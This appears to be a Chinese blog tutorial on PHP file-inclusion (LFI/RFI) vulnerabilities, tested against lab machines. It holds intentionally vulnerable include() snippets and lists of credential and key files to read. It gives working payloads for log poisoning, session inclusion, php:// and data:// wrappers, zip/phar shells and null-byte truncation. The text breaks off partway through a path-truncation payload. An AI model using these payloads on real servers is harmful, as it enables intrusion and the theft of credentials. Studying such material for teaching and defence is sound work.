<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content>
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        文件包含漏洞（LFI/RFI） - 一筐萝卜
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> 你若盛开，清风自来！ </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.jpg">
        </div>
        <div class="name">
            <i>一筐萝卜</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li>
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li>
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li>
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li>
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#文件包含"><span class="toc-text">文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#简介"><span class="toc-text">简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#在php中文件包含函数"><span class="toc-text">在php中文件包含函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#小实例"><span class="toc-text">小实例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#本地文件包含（LFI）"><span class="toc-text">本地文件包含（LFI）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）"><span class="toc-text">windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#linux服务器"><span class="toc-text">linux服务器</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#包含日志文件（SSH-log、environ等）"><span class="toc-text">包含日志文件（SSH log、environ等）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#access-log"><span class="toc-text">access.log</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#包含session"><span class="toc-text">包含session</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php伪协议"><span class="toc-text">php伪协议</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#php-input"><span class="toc-text">php://input</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php-output"><span class="toc-text">php://output</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php-input配合include直接执行php代码"><span class="toc-text">php://input配合include直接执行php代码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php-filter"><span class="toc-text">php://filter</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#data"><span class="toc-text">data://</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#phar"><span class="toc-text">phar://</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#zip"><span class="toc-text">zip://</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#加了一些限制的绕过方法"><span class="toc-text">加了一些限制的绕过方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#指定后缀名"><span class="toc-text">指定后缀名</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#远程文件包含"><span class="toc-text">远程文件包含</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#任意文件包含配合任意文件上传"><span class="toc-text">任意文件包含配合任意文件上传</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#修复方案"><span class="toc-text">修复方案</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#有限制远程文件包含漏洞绕过"><span class="toc-text">有限制远程文件包含漏洞绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#问号绕过"><span class="toc-text">问号绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#号绕过"><span class="toc-text">#号绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#windows和linux差别"><span class="toc-text">windows和linux差别</span></a></li></ol></li></ol></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input">
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i> 你若盛开，清风自来！ </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        文件包含漏洞（LFI/RFI）
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2019-03-28 20:02:28</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#OWASP-TOP-10" title="OWASP-TOP-10">OWASP-TOP-10</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>

    </div>
    <div class="post-content no-indent">
        <p>OWASP TOP 10漏洞—文件包含<br><a id="more"></a></p>
<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>在php中文件包含分为本地文件包含（LFI）和远程文件包含（RFI）</p>
<p>如果一个网站允许客户端用户输入控制动态包含在服务器端的文件，再加上过滤不严的话，会导致恶意代码的执行和敏感信息泄露</p>
<h3 id="在php中文件包含函数"><a href="#在php中文件包含函数" class="headerlink" title="在php中文件包含函数"></a>在php中文件包含函数</h3><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">include</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">include_once</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">require</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">require_once</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">filel_get_contents</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">fopen</span><span class="params">()</span></span></span><br><span class="line"><span class="function"><span class="title">readfile</span><span class="params">()</span></span></span><br></pre></td></tr></table></figure>
<p>其中，include和require区别主要是，include在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而require函数出现错误的时候，会直接报错并退出程序的执行。include_once和require_once和前两个的不同是这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包含超过一次的情况下，确保它只被包含一次以免函数重定义，变量重新赋值等。</p>
<h3 id="小实例"><a href="#小实例" class="headerlink" title="小实例"></a>小实例</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- file.php --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">&lt;?php</span> </span></span><br><span class="line"><span class="php">@<span class="keyword">include</span>($_GET[<span class="string">'filename'</span>]);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- test.txt --&gt;</span></span><br><span class="line"><span class="php"><span class="meta">&lt;?php</span> phpinfo();<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>通过get将test.txt文件名字包含进去，成功的执行了test.txt文件里面的代码</p>
<p>通过测试，test.txt中的代码格式应该是php文件的格式（&lt;?php /<em>code</em>/?&gt;）</p>
<h3 id="本地文件包含（LFI）"><a href="#本地文件包含（LFI）" class="headerlink" title="本地文件包含（LFI）"></a>本地文件包含（LFI）</h3><p>顾名思义，所要包含的文件是在服务器本身的文件，我们可以读取一些在服务器上特殊的敏感信息</p>
<h4 id="windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）"><a href="#windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）" class="headerlink" title="windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）"></a>windows服务器（网上查到是这几个，但是在我的win7虚拟机里面一个也没有，emmmm）</h4><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">c:<span class="symbol">\b</span>oot.ini // 查看系统版本</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\s</span>ystem32<span class="symbol">\i</span>netsrv<span class="symbol">\M</span>etaBase.xml // IIS配置文件</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\r</span>epair<span class="symbol">\s</span>am // 存储Windows系统初次安装的密码</span><br><span class="line">c:<span class="symbol">\P</span>rogramFiles<span class="symbol">\m</span>ysql<span class="symbol">\m</span>y.ini // MySQL配置</span><br><span class="line">c:<span class="symbol">\P</span>rogramFiles<span class="symbol">\m</span>ysql<span class="symbol">\d</span>ata<span class="symbol">\m</span>ysql<span class="symbol">\u</span>ser.MYD // MySQL root密码</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\p</span>hp.ini // php 配置信息</span><br></pre></td></tr></table></figure>
<h4 id="linux服务器"><a href="#linux服务器" class="headerlink" title="linux服务器"></a>linux服务器</h4><figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta-keyword">/etc/</span>passwd <span class="comment">// 账户信息</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>shadow <span class="comment">// 账户密码文件</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>apache2<span class="meta-keyword">/conf/</span>httpd.conf <span class="comment">// Apache2默认配置文件</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>apache2<span class="meta-keyword">/conf/</span>extra/httpd-vhost.conf <span class="comment">// 虚拟网站配置</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>php5<span class="meta-keyword">/lib/</span>php.ini <span class="comment">// PHP相关配置</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>httpd<span class="meta-keyword">/conf/</span>httpd.conf <span class="comment">// Apache配置文件</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>my.cnf <span class="comment">// mysql 配置文件</span></span><br><span class="line"><span class="meta-keyword">/root/</span>.ssh/authorized_keys</span><br><span class="line"><span class="meta-keyword">/root/</span>.ssh/id_rsa</span><br><span class="line"><span class="meta-keyword">/root/</span>.ssh/id_rsa.keystore</span><br><span class="line"><span class="meta-keyword">/root/</span>.ssh/id_rsa.pub</span><br><span class="line"><span class="meta-keyword">/root/</span>.ssh/known_hosts</span><br><span class="line"><span class="meta-keyword">/root/</span>.bash_history</span><br><span class="line"><span class="meta-keyword">/root/</span>.mysql_history</span><br><span class="line"><span class="meta-keyword">/proc/</span>self<span class="meta-keyword">/fd/</span>fd[<span class="number">0</span><span class="number">-9</span>]* (</span><br><span class="line"><span class="meta-keyword">/proc/</span>mounts</span><br><span class="line"><span class="meta-keyword">/proc/</span>config.gz</span><br></pre></td></tr></table></figure>
<h3 id="包含日志文件（SSH-log、environ等）"><a href="#包含日志文件（SSH-log、environ等）" class="headerlink" title="包含日志文件（SSH log、environ等）"></a>包含日志文件（SSH log、environ等）</h3><p>首先来了解一下access.log这个日志文件：</p>
<h4 id="access-log"><a href="#access-log" class="headerlink" title="access.log"></a>access.log</h4><p>access_log记录了所有对Web服务器的访问活动，首先我们先找到这个文件：<br><figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在我被攻击的机器上的位置：/var/<span class="built_in">log</span>/apache2/<span class="keyword">access</span>.<span class="built_in">log</span></span><br></pre></td></tr></table></figure></p>
<p>先把这个文件清空一下，然后再用攻击方进行第一次访问<br><img src="https://s2.ax1x.com/2019/03/28/Aw4Pc4.png" alt><br>把这一条信息提取出来：<br><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">192.168.1.251</span> - - <span class="string">[28/Mar/2019:15:04:13 +0800]</span> <span class="string">"<span class="keyword">GET</span> /test.php?filename=radish HTTP/1.1"</span> <span class="number">200</span> <span class="number">203</span> <span class="string">"-"</span> <span class="string">"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"</span></span><br></pre></td></tr></table></figure></p>
<ul>
<li>包含信息：<br>– 远程主机的地址：192.168.1.251<br>– 空白：“-”占位符<br>– 空白：“-”占位符<br>– 请求的时间：[28/Mar/2019:15:04:13 +0800]<br>– 请求方式以及url：GET<br>– 状态码：200<br>– 发送给客户端的总子节数<br>– 客户端浏览器的信息：Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0</li>
</ul>
<p>发现我们请求的数据有保存在服务器的这个文件中，那么如果我们在请求的数据中添加上php代码的话，再利用文件包含漏洞去包含这个文件，我们的php代码就可以执行了。</p>
<p>首先我们试一下将php代码插入到get传参中<br>第一个payload：<br><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http</span>://192.168.1.239/test.php?filename=<span class="number">%3</span>C?php<span class="number">%20</span>phpinfo();?<span class="number">%3</span>E</span><br></pre></td></tr></table></figure></p>
<p>然后再次包含access.log文件，发现我们插入的代码被转码了<br><img src="https://s2.ax1x.com/2019/03/28/Aw4ABR.png" alt><br>在access.log中还包括了用户访问的浏览器信息，也就是head头部中的User-Agent标识，如果我们把php代码插入到这里，那么同样也是可以执行的，先用burp抓一个包，插入php代码<br><img src="https://s2.ax1x.com/2019/03/28/Aw4ZAx.png" alt> </p>
<p>再次包含日志文件发现成功的执行了插入的php代码<br><img src="https://s2.ax1x.com/2019/03/28/Aw4K3D.png" alt> </p>
<h3 id="包含session"><a href="#包含session" class="headerlink" title="包含session"></a>包含session</h3><p>session存储的地址可以通过phpinfo来查看<br><img src="https://s2.ax1x.com/2019/03/28/Aw42CT.png" alt><br>session的文件名是”sess_“+当前PHPSESSID</p>
<p>测试代码：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span> </span></span><br><span class="line"><span class="php">	session_start();</span></span><br><span class="line"><span class="php">	$_SESSION[<span class="string">'radish'</span>]=$_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">	@<span class="keyword">include</span>($_GET[<span class="string">'filename'</span>]);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>查看session的文件名：<br><img src="https://s2.ax1x.com/2019/03/28/Aw4fv4.png" alt> </p>
<p>确实符合刚刚文件名的规则</p>
<p>第一次访问payload：<br><figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span><span class="comment">//10.10.165.248/rfi.php?filename=radish</span></span><br></pre></td></tr></table></figure></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  sessions ls</span><br><span class="line">sess_p5nt4rt91e53qp3aibjqonh2t4</span><br><span class="line">➜  sessions</span><br></pre></td></tr></table></figure>
<p>然后查看sess_p5nt4rt91e53qp3aibjqonh2t4文件中的内容：</p>
<figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  sessions <span class="built_in">cat</span> sess_p5nt4rt91e53qp3aibjqonh2t4 </span><br><span class="line">radish|s:<span class="number">6</span>:<span class="string">"radish"</span>;<span class="comment">%                                                                                                   ➜  sessions</span></span><br></pre></td></tr></table></figure>
<p>发现这里面有我们传入session的原字符串，那么就好办了，我们先访问一个带有php代码的url，然后再去包含一下session这个文件，就会执行我们的php代码了<br>第一次访问：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http</span>://10.10.165.248/rfi.php?filename=<span class="number">%3</span>C?php<span class="number">%20</span>phpinfo();?<span class="number">%3</span>E</span><br></pre></td></tr></table></figure>
<p>那么现在session中就包含这”&lt;?php phpinfo();?&gt;”，然后再去包含：<br><img src="https://s2.ax1x.com/2019/03/28/Aw45r9.png" alt><br>成功执行代码</p>
<h3 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h3><h4 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h4><p>php://input代表可以访问请求的原始数据，简单来说POST请求的情况下，php://input可以获取到post的数据。<br>比较特殊的一点，enctype=”multipart/form-data” 的时候 php://input 是无效的</p>
<blockquote>
<p>例子：</p>
</blockquote>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    <span class="keyword">echo</span> file_get_contents(<span class="string">"php://input"</span>);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>效果：<br><img src="https://s2.ax1x.com/2019/03/28/Awhc1e.png" alt> </p>
<blockquote>
<p>这一条的原理可以理解为远程文件包含漏洞（RFI）</p>
</blockquote>
<h4 id="php-output"><a href="#php-output" class="headerlink" title="php://output"></a>php://output</h4><p>php://output 是一个只写的数据流， 允许你以 print 和 echo 一样的方式 写入到输出缓冲区</p>
<h4 id="php-input配合include直接执行php代码"><a href="#php-input配合include直接执行php代码" class="headerlink" title="php://input配合include直接执行php代码"></a>php://input配合include直接执行php代码</h4><blockquote>
<p>条件：</p>
<ul>
<li>allow_url_fopen和allow_url_include同时开启，php版本小于5.3.0</li>
</ul>
</blockquote>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span> @<span class="keyword">include</span>($_GET[<span class="string">'filname'</span>]); <span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>效果：<br><img src="https://s2.ax1x.com/2019/03/28/AwhWnA.png" alt> </p>
<h4 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h4><p>利用它可以读取服务器中的文件</p>
<p>由于读取文件的数据直接输出在了页面上，如果读取的是php文件的话，浏览器会直接解析成php代码而不会显示，那么我们可以用这个协议将php文件中的代码以base64的形式输出在页面上：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    @<span class="keyword">include</span>($_GET[<span class="string">'filename'</span>]);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>payload：<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">10.10</span><span class="number">.166</span><span class="number">.222</span>/test/<span class="built_in">file</span>.php?filename=php://<span class="built_in">filter</span>/<span class="built_in">read</span>=<span class="built_in">convert</span>.base64-encode/resource=<span class="built_in">file</span>.php</span><br></pre></td></tr></table></figure></p>
<p>效果：<br><img src="https://s2.ax1x.com/2019/03/28/Awhh7t.png" alt> </p>
<blockquote>
<p>以其他格式显示：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">string<span class="selector-class">.tolower</span> <span class="comment">//写入内容全部变成小写</span></span><br><span class="line">string<span class="selector-class">.toupper</span> <span class="comment">//写入内容全部变成大写</span></span><br><span class="line">string<span class="selector-class">.rot13</span> <span class="comment">//写入内容全部对字符串执行 ROT13 编码</span></span><br></pre></td></tr></table></figure></p>
</blockquote>
<h4 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    @<span class="keyword">include</span>($_GET[<span class="string">'filename'</span>]);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>payload:<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">0.103</span><span class="regexp">/test/</span>file.php?filename=data:<span class="regexp">//</span>text<span class="regexp">/plain;base64,PD9waHAgcGhwaW5mbygpOyA/</span>Pg==</span><br></pre></td></tr></table></figure></p>
<p>payload2<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">192.168</span><span class="number">.0</span><span class="number">.103</span>/test/<span class="built_in">file</span>.php?filename=data:<span class="keyword">text</span>/plain,<span class="meta">&lt;?</span>php phpinfo();<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>效果：<br><img src="https://s2.ax1x.com/2019/03/28/AwhXBn.png" alt> </p>
<h4 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h4><p>这个参数是就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压。前提条件是php版本大于5.3.0，而且压缩包必须是zip协议压缩的文件<br>payload:<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">1.239</span><span class="regexp">/rfi.php?filename=phar:/</span><span class="regexp">/shell.zip/</span>shell.php</span><br></pre></td></tr></table></figure></p>
<h4 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h4><p>和上一个的原理差不多，只是格式不一样<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">192.168</span><span class="number">.1</span><span class="number">.239</span>/rfi.php?filename=zip://<span class="built_in">shell</span>.zip%<span class="number">23</span><span class="built_in">shell</span>.php</span><br></pre></td></tr></table></figure></p>
<p>最后发现把一个简单的phpinfo压缩之后直接包含这个压缩包也可以执行，哈哈</p>
<h3 id="加了一些限制的绕过方法"><a href="#加了一些限制的绕过方法" class="headerlink" title="加了一些限制的绕过方法"></a>加了一些限制的绕过方法</h3><h4 id="指定后缀名"><a href="#指定后缀名" class="headerlink" title="指定后缀名"></a>指定后缀名</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">	@$filename = $_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">    @<span class="keyword">include</span>($filename.<span class="string">".html"</span>);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>直接包含本目录下的test.txt，发现是不能够被包含的，因为文件名最后变成了“test.txt.html”<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.251</span>/<span class="keyword">test</span>/file.php?filename=<span class="keyword">test</span>.txt</span><br></pre></td></tr></table></figure></p>
<p>在最后的参数后面加一个“%00”，实现“%00”截断，发现成功包含</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.251</span>/<span class="keyword">test</span>/file.php?filename=<span class="keyword">test</span>.txt<span class="subst">%00</span></span><br></pre></td></tr></table></figure>
<p><img src="https://s2.ax1x.com/2019/03/28/Aw41ud.png" alt> </p>
<p>另一种方法是路径长度截断，在windows最大长度是256，linux上是4096</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">1.251</span><span class="regexp">/test/</span>file.php?filename=test.txt<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span 